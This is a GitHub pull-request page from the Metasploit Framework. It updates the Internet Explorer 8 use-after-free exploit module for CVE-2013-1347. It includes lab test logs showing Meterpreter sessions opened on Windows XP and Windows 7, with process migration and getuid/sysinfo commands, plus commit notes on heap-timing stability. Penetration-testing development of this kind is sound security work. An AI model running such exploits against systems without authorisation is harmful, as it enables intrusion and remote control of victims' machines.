Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update for CVE-2013-1347 #1809

Merged
merged 3 commits into from May 8, 2013
Merged

Update for CVE-2013-1347 #1809

merged 3 commits into from May 8, 2013

Conversation

wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented May 8, 2013

This mainly updates the RopDb usage and mstime_malloc usage.

@jvazquez-r7
Copy link
Contributor

  • Tested on WXPSP3
msf exploit(ie_cgenericelement_uaf) > [*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /A84yOZCxf7SH
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Sending stage (751104 bytes) to 10.6.0.165

msf exploit(ie_cgenericelement_uaf) > 
[*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /A84yOZCxf7SH
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:57420) at 2013-05-08 16:13:20 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:57420) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (4020)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3944

msf exploit(ie_cgenericelement_uaf) > sessions -i 1[+] Successfully migrated to process 

[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
  • Tested on W7SP1
[*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /A84yOZCxf7SH
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:57738) at 2013-05-08 16:18:33 -0500
[*] Session ID 2 (10.6.0.165:4444 -> 10.6.0.165:57738) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3052)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3004

msf exploit(ie_cgenericelement_uaf) > sessio[+] Successfully migrated to process 
ns -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.187 - Meterpreter session 2 closed.  Reason: User exit

msftidy happy also, Merging!

jvazquez-r7 pushed a commit that referenced this pull request May 8, 2013
Land #1809, @wchen-r7's modification for ie_cgenericelement_uaf
bdd2287
@jvazquez-r7 jvazquez-r7 merged commit 9a1400a into rapid7:master May 8, 2013
wchen-r7 added a commit to wchen-r7/metasploit-framework that referenced this pull request May 9, 2013
@wchen-r7
A slight change for stability
9043eed 
While updating ie_cgenericelement_uaf earlier today, I noticed the
changes made it a tiny bit less stable. Juan's test log in rapid7#1809
also kinda shows that (with the first attempt failing), so I decided
to go back and move the string crafting part, that way between
CollectGarbage() and the overwrite, there is less noise, and hopefully
more stable.  I did a few tests, seems better.
@wchen-r7 wchen-r7 mentioned this pull request May 9, 2013
Merged
dougsko pushed a commit to dougsko/metasploit-framework that referenced this pull request Jun 20, 2013
@wchen-r7 @dougsko
A slight change for stability
ee7f36f 
While updating ie_cgenericelement_uaf earlier today, I noticed the
changes made it a tiny bit less stable. Juan's test log in rapid7#1809
also kinda shows that (with the first attempt failing), so I decided
to go back and move the string crafting part, that way between
CollectGarbage() and the overwrite, there is less noise, and hopefully
more stable.  I did a few tests, seems better.
@wchen-r7 wchen-r7 deleted the cve_2013_1347_update_1 branch August 22, 2016 16:23
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@wchen-r7 @jvazquez-r7